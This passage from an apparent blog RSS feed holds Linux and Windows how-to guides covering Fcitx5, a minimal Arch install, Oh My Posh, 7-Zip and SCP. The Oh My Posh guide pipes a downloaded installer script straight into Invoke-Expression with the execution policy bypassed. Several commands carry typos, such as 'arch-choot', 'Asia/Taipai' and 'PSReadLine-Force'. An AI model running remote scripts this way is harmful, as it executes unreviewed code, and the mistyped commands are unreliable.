The Raspberry Pi power supply utilizes a Type-C port. While you can leverage an Android mobile phone cable for power, investing in the official power supply is recommended for optimal performance and convenience.

![power-supply](https://raspberrypi.dk/wp-content/uploads/2019/06/usb-c-stroemforsyning-raspberry-pi-eu-5v-3a.jpg)

### 2. Micro SD Card - Install and Run Your OS

To install and run the operating system (OS), a Micro SD Card is indispensable. Acquire a USB Hub with a built-in Micro SD Card reader for added convenience.

![sd-card](https://www.easyshoppi.com/wp-content/uploads/2019/11/vvv2.jpg)

### 3. Keyboard, Mouse - Navigating Your Raspberry Pi

A keyboard is a necessity for typing, while a mouse is optional. Ensure you have a keyboard at your disposal for a smooth interaction with your Raspberry Pi.

![keyboard-mouse](https://hocotech.com/wp-content/uploads/2022/02/hoco-gm12-light-and-shadow-rgb-gaming-keyboard-mouse-set-english.jpg)

### 4. Micro HDMI Cable - Connect to Your Monitor

For users accustomed to connecting devices with HDMI cables, a Micro HDMI Cable is required. Alternatively, a Micro HDMI Adapter can be employed for seamless connectivity.

![mirco-hdmi-cable](https://www.bhphotovideo.com/images/images2500x2500/Pearstone_hdd_1015_High_Speed_HDMI_to_Micro_888043.jpg)

### 5. Understanding Hardware and Linux Basics

Given that Raspberry Pi operates with Linux-based OS, a fundamental understanding of Linux commands and hardware components is beneficial. Familiarize yourself with ports like Ethernet, USB-A, and USB-C.

![linux-distro](https://149366088.v2.pressablecdn.com/wp-content/uploads/2020/01/distro-board.jpg)

# Final Thoughts - Unleashing the Power of Raspberry Pi

Before you dive into the world of Raspberry Pi, it&apos;s crucial to understand its features and requirements. Consider your specific needs and whether Raspberry Pi aligns with your goals. Armed with this knowledge, you can confidently embark on an exciting journey into the realm of Raspberry Pi technology!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Arch Linux Fcitx5 Installation Guide for Quick Classic (速成)</title><link>https://ummit.dev//posts/linux/tools/fcitx/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/fcitx/</guid><description>Learn how to install and configure Fcitx5 on Arch Linux to enable multilingual typing support for languages such as Chinese and Japanese.</description><pubDate>Fri, 16 Dec 2022 00:00:00 GMT</pubDate><content:encoded>## Fcitx5 Introduction

Fcitx5, the successor to Fcitx, is a lightweight input method framework for Linux. Offering additional language support through various addons, it enhances your typing experience on Linux systems. This guide will walk you through the installation process and configuration steps for Fcitx5.

## Install Fcitx5 and Required Addons

Let&apos;s start by installing Fcitx5 and the necessary addons to enable multilingual typing support.

```shell
sudo pacman -S fcitx5-chinese-addons libime fcitx5 fcitx5-table-extra
```

### Support Program Windows

To ensure comprehensive language support across various programs, install libraries for technologies used by different applications. Execute the following command:

```shell
sudo pacman -S fcitx5-qt fcitx5-gtk fcitx5-im
```

## Environment variables

Environment variables are necessary to ensure the input method works correctly for x11.

&gt;TIPS: If you under wayland. You can skip this step as well. Wayland dont need to set environment variables for input method.

```shell
sudo vim /etc/environment
```

Paste the following lines:

```shell
export GTK_IM_MODULE=fcitx
export XMODIFIERS=fcitx
export QT_IM_MODULE=fcitx
export SDL_IM_MODULE=fcitx
```

## Configuring Input Methods

You will need to configure the input method to select your desired input language. For this, fcitx5 provides a configuration tool for any Display Manager. Better to use the fcitx5-tool directly.

```shell
sudo pacman -S fcitx5-configtool
```

1. After installed the tool, you should be able to find it in your application menu, open it and configure your input method.
2. Find you preferred input language and add it to the list. (e.g., Quick Classic for 速成輸入法)
3. Use the arrow `&lt;` button to move it to the current input method list.

&gt;TIPS: In case you dont found your preferred input method, You can check the `Only Show Current Language` option to show all available input methods.

![config tool](./configtool.png)

## Restart

After completing the above steps, log out and log back in to apply the changes.

&gt;TIPS: Wayland user don&apos;t need to restart the system. The changes will be applied immediately.

## Check System Configuration

Type the following command to verify the system configuration:

```shell
echo $GTK_IM_MODULE
```

If `fcitx5` is displayed, the configuration was successful.

## Font Problem and Solution

If you encounter font display issues, particularly garbled characters, install a Chinese font package. Run the following command:

```shell
sudo pacman -S wqy-zenhei
```

And restart the fcitx5 to apply the changes.

# References

- [Arch Linux - Simplified Chinese Localization](https://wiki.archlinux.org/title/Localization/Simplified_Chinese?rdfrom=https%3A%2F%2Fwiki.archlinux.org%2Findex.php%3Ftitle%3DLocalization_%28%25E7%25AE%2580%25E4%25BD%2593%25E4%25B8%25AD%25E6%2596%2587%29%2FSimplified_Chinese_%28%25E7%25AE%2580%25E4%25BD%2593%25E4%25B8%25AD%25E6%2596%2587%29%26redirect%3Dno)
- [ProgrammerAll - Fcitx5 Installation Guide](https://www.programmerall.com/article/6459746231/)
- [YouTube Video Tutorial](https://www.youtube.com/watch?v=yXSDJWtGeKY)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Step-by-Step Guide to Install Arch Linux from Scratch (Minimal System)</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-base-installation/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-base-installation/</guid><description>Guide for helping people to install Arch Linux from scratch, resulting in a minimal system. Not including the installation of a desktop environment :)</description><pubDate>Fri, 16 Dec 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction

This comprehensive guide will walk you through the process of installing Arch Linux from start to finish, resulting in a minimal system. Please note that this guide will not cover the installation of a desktop environment.

Before you begin, it&apos;s assumed that you have a basic understanding of computer operations and are familiar with using a virtual machine or have a spare computer for the installation of Arch Linux. The process of booting the Arch Linux ISO will not be covered in this guide.

### Before You Begin

Arch Linux operates on a philosophy of simplicity, user control, and customization. Unlike more user-friendly distributions such as Linux Mint or Ubuntu, Arch does not provide a graphical user interface (GUI) during the installation process. Instead, it relies heavily on the command line.

If you are new to GNU/Linux or have less than a year of experience, it is advisable to gain some familiarity with GNU/Linux basics before attempting an Arch installation.

In Arch, every step of the installation process is executed through the command line. This direct exposure to the terminal allows for greater control but may be challenging if you are uncomfortable with command-line operations.

## Check the Connection

Before starting the installation, ensure that you have a working internet connection. You can verify your connection by using the `ping` command:

```shell
ping archlinux.org
```

### Network Connection via Wireless (Wi-Fi)

If you are using a wireless connection, you can connect to a Wi-Fi network using the `iwctl` command, which is part of the iwd package installed by default on the official Arch Linux ISO.

To start the `iwctl` command, enter:

```shell
iwctl
```

Then, use the following commands to connect to your Wi-Fi network:

```shell
[iwd]# device list
[iwd]# station wlan0 scan
[iwd]# station wlan0 get-networks
[iwd]# station wlan0 connect [SSID]
```

After successfully connecting to the Wi-Fi network, exit the `iwctl` command by typing `exit`. You can then check your connection again using the `ping` command.

## Partition Setup

Before installing Arch Linux, you need to partition your disk. You can use tools like `cfdisk`, `fdisk`, or `gdisk` for this purpose. In this guide, we will use `gdisk`.

### Using gdisk

First, list the available disks:

```shell
lsblk
```

Next, use `gdisk` to partition the disk:

```shell
gdisk /dev/sda
```

Create the following partitions:

1. Type `o` to create a new GPT partition table.
2. Type `n` to create a new partition, then press `Enter` to accept the default first sector.
3. Type `+500M` for the last sector and `ef00` for the partition type (EFI System).
4. Type `n` to create another partition, accept the default first sector, type `+30G` for the last sector, and `8300` for the partition type (Linux filesystem).
5. Repeat the previous step to create a third partition with `+25G` for the last sector and `8300` for the partition type (Linux filesystem).
6. Finally, create a fourth partition, accept the default first sector, type `+4.5G` for the last sector, and `8200` for the partition type (Linux swap).

After creating the partitions, type `w` to write the changes to the disk. You should now have the following partitions:

| Size   | Type                | Code  |
|--------|---------------------|-------|
| 500M   | EFI System          | ef00  |
| 30G    | Linux filesystem     | 8300  |
| 25G    | Linux filesystem     | 8300  |
| 4.5G   | Linux swap          | 8200  |

## Parition Format

Before installing Arch Linux, you need to format the partitions. We will use the `mkfs` command for this purpose.

First, format the EFI System partition, which is used for the boot loader:

```shell
mkfs.fat -F32 /dev/sda1
```

Next, format the root and home partitions with the ext4 filesystem:

```shell
mkfs.ext4 /dev/sda2
mkfs.ext4 /dev/sda3
```

Finally, format the swap partition using the `mkswap` command:

```shell
mkswap /dev/sda4
swapon /dev/sda4
```

### Mount the Partitions

Now, mount the partitions to the `/mnt` directory, starting with the root partition:

```shell
mount /dev/sda2 --mkdir /mnt
```

Next, mount the home partition:

```shell
mount /dev/sda3 --mkdir /mnt/home
```

&gt;TIPS: The efi partition will not be mounted here, we&apos;ll mount it after chrooting into the new system.

## Install Basic Arch System

Let&apos;s install the basic Arch Linux system with the `pacstrap` command.

```shell
pacstrap -i /mnt base base-devel linux linux-headers linux-firmware vim networkmanager sudo
```

## Generate File System Table (fstab)

Generate the file system table, This table is used by the system to determine how to mount the partitions.

```shell
genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
```

## Switching new system

Switch to the new system by using `arch-chroot`:

```shell
arch-choot /mnt
```

## Update the root password

Your root password is not set by default, so you need to set it:

```shell
passwd
```

## Add a new user

Create a new normal user:

```shell
useradd -m &lt;username&gt;
```

Set the password for the new user:

```shell
passwd &lt;username&gt;
```

Add permissions to the new user:

```shell
usermod -aG wheel,storage,power &lt;username&gt;
```

## Apply new user permissions

We will give the new user permissions to use `sudo`:

```shell
EDITOR=vim visudo
```

Uncomment the following line:

```shell
%wheel ALL=(ALL:ALL) ALL`:
```

Set timeout to 0, so you don&apos;t need to wait every time for the password delay:

```shell
Defaults timestamp_timeout=0
```

## System Language

We will set the system language to English (US) UTF-8 and generate the locale.

```shell
vim /etc/locale.gen
```

Find `en_US.UTF-8 UTF-8` and remove the `#` symbol to uncomment it. and save the file.

Generate the locale:

```shell
locale-gen
```

Set the system language:

```shell
echo LANG=en_US.UTF-8 &gt; /etc/locale.conf
```

## Hostname Settings

Set the hostname:

```shell
echo Archlinux &gt; /etc/hostname
```

Edit the hosts file:

```shell
vim /etc/hosts
```

Add the following lines:

```shell
127.0.0.1      localhost
::1            localhost
127.0.0.1      Archlinux.localdomain    localhost
```

## Timezone Sync

Set the timezone:

```shell
ln -sf /usr/share/zoneinfo/Asia/Taipai /etc/localtime
```

Sync the hardware clock:

```shell
hwclock --systohc
```

## Mount EFI Partition

It&apos;s time to mount the EFI partition to `/boot/efi`.

```shell
mount /dev/sda1 --mkdir /boot/efi
```

### Bootloader configuration

Install GRUB and efibootmgr for UEFI systems:

```shell
pacman -S grub efibootmgr
```

Install GRUB for UEFI systems for the first time:

```shell
grub-install --target=x86_64-efi --efi-directory=/boot/efi
```

Generate the GRUB configuration file:

```shell
grub-mkconfig -o /boot/grub/grub.cfg
```

## Enable Internet Service

It&apos;s essential to enable the NetworkManager service to have internet access after rebooting the system.

```shell
systemctl enable NetworkManager.service
```

## Exit the chroot environment

As for the setup of minimal Arch Linux, we are done now :) Let&apos;s exit the chroot environment.

```shell
exit
```

## Reboot

Reboot to enjoy your new Arch Linux system :)

```shell
reboot
```

## Conclusion

Arch linux is a great distribution for those who want to learn more about Linux and have a more personalized experience. The installation process might be challenging, but it&apos;s a rewarding journey that allows you to build a system tailored to your preferences.

After you master the arch linux, you should now feel more comfortable with the command line and have a understanding of how a GNU/Linux system works and also as well as the ability to troubleshoot issues that may arise.

For more hardcores, you can try to install Gentoo or LFS (Linux From Scratch) to further deepen your knowledge of GNU/Linux.

But before that, you should feel arch is simple and easy to use. otherwise, these two distributions will be a nightmare for you. Since they are a source based distribution, you need to compile everything from the source code. and the configuration is more difficult than Arch Linux.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Windows Terminal: A Guide to Installing Oh My Posh and Customize</title><link>https://ummit.dev//posts/windows/terminal/omp/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/omp/</guid><description>Transform your Windows terminal experience with Oh My Posh! Follow this guide to learn how to install and customize this sleek and powerful prompt framework.</description><pubDate>Wed, 22 Jun 2022 00:00:00 GMT</pubDate><content:encoded>## Why Oh My Posh?

Are you tired of the same old, bland terminal prompts on your Windows system? Do you yearn for a more stylish and functional command-line experience? Look no further than Oh My Posh! This dynamic and customizable prompt framework can take your terminal game to the next level. In this guide, we&apos;ll walk you through the process of installing and setting up Oh My Posh on your Windows machine.

## What is Oh My Posh?

Oh My Posh is a versatile and extensible prompt framework designed to enhance the appearance and functionality of your terminal. With Oh My Posh, you can create visually appealing and informative prompts that display relevant information about your environment, such as the current directory, Git branch, and more. It&apos;s a fantastic tool for developers, system administrators, and anyone who spends a significant amount of time in the terminal.

## Install Windows Terminal

Before we begin installing Oh My Posh, ensure that you have Windows Terminal installed on your system. You can easily find it on the Microsoft Store using the following link: [Windows Terminal on Microsoft Store](ms-windows-store://pdp/?productid=XP8K0HKJFRXGCK). Simply click the link to navigate to the store and install Windows Terminal.

## Install Oh My Posh

Installing Oh My Posh on your Windows system is a breeze, and you have multiple options to choose from. Whether you prefer package managers or manual installation. Here are three methods to install Oh My Posh:

### Method 1: Using `winget`

For using `winget` (Windows Package Manager) install Oh My Posh, using the following command:

```powershell
winget install JanDeDobbeleer.OhMyPosh -s winget
```

### Method 2: Using `scoop`

For those who rely on `scoop` (the Windows command-line installer), installing Oh My Posh is as simple as running this command:

```powershell
scoop install https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/oh-my-posh.json
```

### Method 3: `Manual` Installation

If you prefer manual installation, follow these steps:

1. Open your PowerShell terminal as an administrator.

2. Run the following command to set the execution policy and bypass any restrictions:

```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
```

3. Next, execute the following command to download and install Oh My Posh:

```powershell
Invoke-Expression ((New-Object System.Net.WebClient).DownloadString(&apos;https://ohmyposh.dev/install.ps1&apos;))
```

And that&apos;s it! Oh My Posh is now successfully installed on your Windows system.

## Understanding Nerd Fonts

Nerd Fonts are specialized fonts that have been patched to include a wide range of icons and symbols. These fonts are essential for Oh My Posh to display icons associated with themes and prompts correctly.

&gt; Notes: While various Nerd Fonts are compatible with Oh My Posh,In the official website, the developer recommends that you use the [Meslo LGM NF](https://github.com/ryanoasis/nerd-fonts/releases/download/v3.0.2/Meslo.zip) for the best experience.

### Installing Fonts for Oh My Posh

When it comes to personalizing your terminal experience with Oh My Posh, fonts play a crucial role in adding style and functionality. Nerd Fonts, a collection of fonts patched with icons, are the go-to choice for Oh My Posh users. In this guide, we&apos;ll walk you through the process of installing Nerd Fonts to enhance your Oh My Posh experience.

#### Way1: Using Oh My Posh&apos;s CLI for Font Installation

Oh My Posh simplifies the process of installing Nerd Fonts with its built-in CLI (Command Line Interface). Follow these steps to install a Nerd Font using the CLI:

1. Open your terminal as an administrator for system-wide font installation. Alternatively, if you lack admin rights, you can use the `--user` flag, keeping in mind that this may have certain side effects with specific applications.

2. Execute the following command to start the font installation process:

```powershell
oh-my-posh font install
```

#### Way2: Manual Installation of Nerd Fonts

Alternatively, you can manually install Nerd Fonts by following these steps:

1. Visit the Nerd Fonts website at [www.nerdfonts.com](https://www.nerdfonts.com/font-downloads).

2. Download the zip archive containing your preferred Nerd Font.

3. Extract the contents of the zip archive.

4. Right-click on each font file and select &quot;Install&quot; to install the fonts on your system.

#### Adjusting Terminal Font Settings

To fully benefit from the installed Nerd Fonts, you might need to configure your terminal to use them. Here&apos;s how you can do it:

1. Open your terminal.

2. Access the terminal&apos;s settings or preferences menu. This can typically be found in the menu bar.

3. Navigate to the &quot;Presets,&quot; &quot;Profiles,&quot; or &quot;Appearance&quot; section.

4. Look for the font settings and select the Nerd Font you installed. Adjust the font size if needed.

##### Visual Guide

For a visual walkthrough of the font installation process, refer to the following animated guide:

![Install Nerd Fonts](./set-fonts.gif)

## Browsing and Selecting Themes

To discover the available themes, you can visit the official Oh My Posh themes documentation [here](https://ohmyposh.dev/docs/themes). Here, you&apos;ll find a collection of themes, each designed to provide a unique and captivating terminal prompt.

### Listing Available Themes

1. **Discover Themes**: To explore the wide array of available themes, navigate to the official Oh My Posh themes documentation by clicking here. Here, you&apos;ll find an enticing collection of themes, each meticulously designed to offer a distinctive and engaging terminal prompt.

2. **Command-Line Discovery**: Alternatively, you can use the command line to list all the available themes. Open your terminal and execute the following command:

```powershell
Get-PoshThemes
```

![listing-themes](./list.gif)

### Previewing Themes

Before applying a theme, it&apos;s a good idea to preview how it will look on your terminal. You can use the following command to see how a specific theme would appear:

```powershell
oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\&lt;theme_name&gt;.omp.json | Invoke-Expression
```

Replace &lt;theme_name&gt; with the actual name of the theme you&apos;re interested in.

This command allows you to get a real-time preview of how the selected theme will affect your terminal prompt. It&apos;s a convenient way to try out different themes and see which one resonates with your style.

### Applying the Themes

After you&apos;ve found a theme that catches your eye, it&apos;s time to make it your own. To get started, follow these steps:

1. **Open Your Terminal**: Launch your terminal application to begin the customization process.

2. **Create a Profile Script**: If you don&apos;t have a profile script already, you&apos;ll need to create one. The profile script controls the configuration settings for your terminal. Use the following command to create a new profile script:

   ```powershell
   New-Item -Path $PROFILE -Type File -Force
   ```

   This command will create a new profile script in the specified path.

3. **Access Theme Configuration**: To edit the `$PROFILE` script, you can use the Notepad text editor. Open Notepad and then open the `$PROFILE` script using the command:

   ```powershell
   notepad $PROFILE
   ```

   The path to the `$PROFILE` script is typically:

   ```plain
   C:\Users\&lt;Your_Username&gt;\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
   ```

4. **Selecting a Theme**:

   a. **Option 1 - Set-PoshPrompt**:
   Locate the line that sets the theme using the `Set-PoshPrompt` command. Modify this line to reflect the name of the theme you want to use. For example:

   ```powershell
   Set-PoshPrompt -Theme theme_name
   ```

   Replace `theme_name` with the actual name of the theme you selected.

   b. **Option 2 - oh-my-posh init**:
   Alternatively, you can use the following command to select a theme and apply it directly to your current terminal session:

   ```powershell
   oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\&lt;theme_name&gt;.omp.json | Invoke-Expression
   ```

   Replace `theme_name` with the actual name of the theme you selected.

5. **Save and Apply Changes**: Save the changes to the `$PROFILE` script in Notepad and close the editor.

By following these steps, you&apos;ll seamlessly integrate your chosen theme into your terminal environment, allowing you to enjoy a personalized and visually appealing command-line experience.

## Optional: Installing and Inserting Required Modules

In this section, we will walk through the process of installing and inserting the necessary modules to enhance your Oh My Posh experience. These modules provide additional features such as displaying illustrations, colors, command history, and Git information. Let&apos;s get started!

&gt;Notes: Before you proceed, please open PowerShell as an &lt;code&gt;Administrator&lt;/code&gt;.

### Install PSReadLine Module

The `PSReadLine` module is essential for displaying the commands you&apos;ve entered before, making it convenient for you to re-enter commands.

```powershell
Install-Module PSReadLine -Force
```

### Install posh-git Module

The `posh-git` module is used to display Git information from your current repository (if you&apos;re in a Git repository).

```powershell
Install-Module posh-git -Force
```

### Install Terminal-icons Module

The `Terminal-icons` module enhances your command console by displaying icons for your files and folders, adding a visually appealing touch to your terminal.

```powershell
Install-Module Terminal-icons -Force
```

## Inserting Modules for Enhanced Functionality

Now that we&apos;ve installed the necessary modules, let&apos;s delve into how to insert them into PowerShell, allowing you to utilize their functions and enhance your terminal experience. Below, we&apos;ll guide you through the process of inserting each module.

### Inserting Terminal-icons Module

The `Terminal-icons` module enhances your command console by displaying icons for files and folders, making your terminal visually engaging and informative. To insert this module, follow these steps:

1. Launch PowerShell.

2. Enter the following command:

   ```powershell
   Import-Module Terminal-icons
   ```

   This will load the `Terminal-icons` module into your PowerShell session.

### Inserting posh-git Module

The `posh-git` module is designed to display Git-related information, such as the current branch name in your repository. To insert this module, proceed as follows:

1. Launch PowerShell.

2. Enter the following command:

   ```powershell
   Import-Module posh-git
   ```

   This command will load the `posh-git` module, enabling its features in your terminal.

### Inserting PSReadLine Module

The `PSReadLine` module enriches your command history experience by offering several modes. To insert this module, follow these steps:

1. Launch PowerShell.

2. Enter the following command:

   ```powershell
   Import-Module PSReadLine
   ```

   This command will load the `PSReadLine` module, providing enhanced command history capabilities.

By inserting these modules, you&apos;ll unlock a range of features and visual enhancements that will elevate your PowerShell sessions. Whether you&apos;re dealing with files and folders, Git repositories, or command history, these modules will streamline your interactions and make your terminal usage more efficient and enjoyable.

#### PSReadLine Modes for Enhanced Command History

Enhance your PowerShell command history experience with different PSReadLine modes that cater to your preferences and ease of use. PSReadLine offers various modes to facilitate command recall and streamline your interactions with previous commands. Here&apos;s how to utilize these modes:

#### PSReadLine Mode: History

This mode mimics the behavior seen on most Linux systems and is a favorite among many users. To enable this mode, use the following command:

&gt; **Note**: In this mode, if the text you&apos;re about to enter matches previous text, a gray prompt displays the matching text.

```powershell
Set-PSReadLineOption -PredictionSource History
```

![PSReadLine Mode: History](./history_1.gif)

#### PSReadLine Mode: ListView

The ListView mode presents a list of all commands related to the text you&apos;ve typed, offering easy command selection. Use the arrow keys (↑ ↓ ← →) to navigate the list, and press Enter to execute the selected command.

&gt;**Tip**: Utilize the arrow keys to navigate and press Enter to execute the selected command.

To activate the ListView mode, execute the following command:

```powershell
Set-PSReadLineOption -PredictionViewStyle ListView
```

![PSReadLine Mode: ListView](./history_2.gif)

By selecting the PSReadLine mode that aligns with your workflow, you can make your PowerShell interactions even more efficient and tailored to your needs. Experiment with these modes to find the one that best suits your preferences.

## Configuring Persistent Modifications in Your PowerShell Profile

While the changes you&apos;ve made so far are valuable, they only apply to the current terminal window. If you close the window, these modifications will be lost. To ensure that your enhancements remain in effect every time you launch PowerShell, you&apos;ll need to make adjustments to your PowerShell profile.

### Opening with Notepad

1. using Notepad to edit files, you can initiate the editing process with the following PowerShell command:

```powershell
notepad $PROFILE
```

#### Modifying the Profile File

2. Once the profile file is open in your preferred text editor, insert the following lines of code:

```powershell
Import-Module Terminal-icons
Import-Module posh-git

Set-PSReadLineOption -PredictionSource History

oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\microverse-power.omp.json | Invoke-Expression
```

3. Save the changes you&apos;ve made to the profile file and then close the text editor.

By appending these lines to your PowerShell profile, you ensure that the specified modules are loaded and the defined settings are applied each time you initiate PowerShell. With this setup, you&apos;ll enjoy a consistent and enriched terminal experience every time you launch PowerShell.

## Article Usage Directives

To facilitate your interaction with this article, here is a concise list of the PowerShell commands and instructions that have been discussed:

1. Installing Oh My Posh using Winget:
   ```powershell
   winget install JanDeDobbeleer.OhMyPosh -s winget
   ```

2. Installing Oh My Posh using Scoop:
   ```powershell
   scoop install https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/oh-my-posh.json
   ```

3. Installing Oh My Posh manually:
   ```powershell
   Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString(&apos;https://ohmyposh.dev/install.ps1&apos;))
   ```

4. Installing the PSReadLine Module:
   ```powershell
   Install-Module PSReadLine-Force
   ```

5. Installing the posh-git Module:
   ```powershell
   Install-Module posh-git-Force
   ```

6. Installing the Terminal-icons Module:
   ```powershell
   Install-Module Terminal-icons -Force
   ```

7. Importing the Terminal-icons Module:
   ```powershell
   Import-Module Terminal-icons
   ```

8. Importing the posh-git Module:
   ```powershell
   Import-Module posh-git
   ```

9. Importing the PSReadLine Module:
   ```powershell
   Import-Module PSReadLine
   ```

10. Setting PSReadLine mode to History:
    ```powershell
    Set-PSReadLineOption -PredictionSource History
    ```

11. Setting PSReadLine mode to ListView:
    ```powershell
    Set-PSReadLineOption -PredictionViewStyle ListView
    ```

12. Displaying Available Oh My Posh Themes:
    ```powershell
    Get-PoshThemes
    ```

14. Initializing Oh My Posh with a Chosen Theme:
    ```powershell
    oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\microverse-power.omp.json | Invoke-Expression
    ```

15. Opening Your PowerShell Profile with Notepad:
    ```powershell
    notepad $PROFILE
    ```

## Conclusion

In this guide, we&apos;ve explored the process of enhancing your Windows terminal experience using Oh My Posh. By incorporating stylish themes, powerful modules, and customizable configurations, you can transform your command-line environment into a more productive and visually appealing workspace. Here&apos;s a summary of what we&apos;ve covered:

1. **Installation and Setup**: We began by installing Oh My Posh using different methods, such as Winget, Scoop, and manual installation. We also emphasized the importance of using Nerd Fonts for optimal display.

2. **Theme Selection**: We introduced you to the wide variety of themes available for Oh My Posh and demonstrated how to preview and choose a theme that suits your style.

3. **Module Installation**: We explored the installation of essential modules—PSReadLine, posh-git, and Terminal-icons. These modules enhance your terminal experience by providing command history, Git information, and file and folder icons.

4. **Module Integration**: We explained how to integrate the installed modules into your PowerShell profile. This ensures that the modules are loaded automatically whenever you start PowerShell, enabling a consistent and enhanced terminal environment.

5. **PSReadLine Modes**: We covered different PSReadLine modes—History and ListView—that enhance command prediction and navigation within your terminal.

6. **Profile Customization**: We guided you through locating and modifying your PowerShell profile file. By adding specific commands to your profile, you can ensure that your chosen themes and modules are seamlessly integrated each time you launch PowerShell.

With the knowledge gained from this guide, you&apos;re now equipped to take control of your Windows terminal environment and create a customized workspace that reflects your preferences and boosts your productivity. Whether you&apos;re a developer, system administrator, or casual user, Oh My Posh empowers you to make the most of your command-line interactions.

Remember, the journey doesn&apos;t end here—experiment with themes, explore more modules, and tweak your settings until you achieve the perfect terminal setup tailored to your needs. Enjoy the powerful and visually pleasing experience that Oh My Posh brings to your Windows terminal!

## References

- https://ohmyposh.dev/docs/
- https://www.kwchang0831.dev/dev-env/pwsh/oh-my-posh</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>7-Zip on Linux: Installation and Usage Guide</title><link>https://ummit.dev//posts/linux/tools/7zip/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/7zip/</guid><description>Discover the Remarkable Efficiency of 7-Zip for File Compression and Extraction on the Linux Platform. and learn how to use!</description><pubDate>Wed, 16 Feb 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction

7-Zip is a robust and versatile file compression tool that provides exceptional compression ratios while supporting a wide range of archive formats. In this guide, we&apos;ll delve into the world of 7-Zip on Linux, exploring its features, installation process, and practical usage scenarios.

## What is 7-Zip?

7-Zip is an open-source file archiver utility that excels at compressing files and creating archives. It stands out for its high compression ratio and support for various archive formats, making it an invaluable tool for reducing file sizes and organizing data.

### Installation

Getting started with 7-Zip on Linux is a breeze. Depending on your Linux distribution, you can use the package manager to install it.

#### For Ubuntu/Debian:

```shell
sudo apt update
sudo apt install p7zip-full p7zip-rar
```

#### For CentOS/RHEL:

```shell
sudo yum install epel-release
sudo yum install p7zip p7zip-plugins
```

#### For Arch based:

```shell
sudo pacman -S p7zip
```

#### For Gentoo:

```shell
sudo emerge -av app-arch/p7zip
```

### Basic Usage

Once installed, you can harness 7-Zip&apos;s capabilities using the command-line interface. Here are some essential commands to get you started:

1. **Creating an Archive:**

   To create a new archive, use the `7z` command followed by the archive name and the files you want to include:

   ```shell
   7z a archive.7z file1.txt file2.txt directory/
   ```

2. **Extracting Files:**

   Extracting files from an archive is just as simple. Use the `7z` command followed by the `x` flag and the archive name:

   ```shell
   7z x archive.7z
   ```

3. **Listing Contents:**

   To view the contents of an archive without extracting it, use the `l` flag:

   ```shell
   7z l archive.7z
   ```

4. **Adding to an Existing Archive:**

   You can add files to an existing archive by using the `u` flag:

   ```shell
   7z u archive.7z newfile.txt
   ```

## Conclusion

7-Zip is a powerful compression tool that can streamline file management and reduce storage space on your Linux system. By installing and mastering 7-Zip&apos;s command-line interface, you&apos;ll be equipped to efficiently compress, extract, and manage various archive formats, enhancing your productivity and organization skills. Whether you&apos;re handling personal files or managing server backups, 7-Zip proves to be an indispensable utility for Linux users seeking optimal compression solutions.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>SCP: A Comprehensive Guide</title><link>https://ummit.dev//posts/linux/tools/ssh/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ssh/</guid><description>Discover the power of secure and efficient file transfers using SCP (Secure Copy) and learn how to seamlessly manage remote server access with SSH login methods. </description><pubDate>Thu, 27 Jan 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the realm of remote server management, the ability to securely transfer files and efficiently access remote systems is of paramount importance. This is where the `scp` (secure copy) command and SSH (Secure Shell) login methods shine. `scp` allows you to securely transfer files between local and remote systems, while SSH ensures robust authentication and data encryption. In this guide, we will delve into the world of `scp` for file transfers and explore advanced features, including verbose mode and custom port usage, to elevate your file transfer experience.

## Secure File Transfer with SCP

### Understanding SCP

`scp` (Secure Copy) is a command-line utility that facilitates secure file transfers between local and remote systems. Leveraging the security features of SSH, `scp` ensures your data remains encrypted and protected during transit.

### Utilizing Verbose Mode for Transparency

The `scp` command provides a `--verbose` flag (`-v` for short) that displays detailed information about the file transfer process. This can be immensely helpful for troubleshooting and gaining insights into the transfer progress.

To enable verbose mode, simply append the `--verbose` flag to your `scp` command:

```shell
scp --verbose &lt;local_file&gt; user@remote_host:remote_path
```

### Customizing Port Usage

By default, `scp` uses port 22 for SSH connections. However, you can specify a custom port using the `-P` flag followed by the desired port number:

```shell
scp -P &lt;custom_port&gt; &lt;local_file&gt; user@remote_host:remote_path
```

## Streamlined Remote Server Access with SSH

### Enhanced Security with Verbose Logging

SSH also offers a verbose mode, which can be activated using the `-v` flag. This mode provides detailed information about the SSH connection process, aiding in debugging and security audits.

```shell
ssh -v user@remote_host
```

### Custom Ports for SSH Connections

Similar to `scp`, SSH allows you to specify custom ports for connections using the `-p` flag followed by the port number:

```shell
ssh -p &lt;custom_port&gt; user@remote_host
```

## Conclusion

By harnessing the power of `scp` for secure file transfers and leveraging advanced features such as verbose mode and custom port usage, you can significantly enhance your remote server management capabilities. These tools provide not only security and efficiency but also transparency and flexibility, ensuring that you have full control over your file transfers and remote access. Incorporate these techniques into your workflow to elevate your server administration prowess and streamline your interactions with remote systems.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to use Linux rm Command</title><link>https://ummit.dev//posts/linux/built-in-tools/rm/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/built-in-tools/rm/</guid><description>Learn how to use the rm command in Linux to remove files and directory.</description><pubDate>Sat, 08 Jan 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction to the rm Command

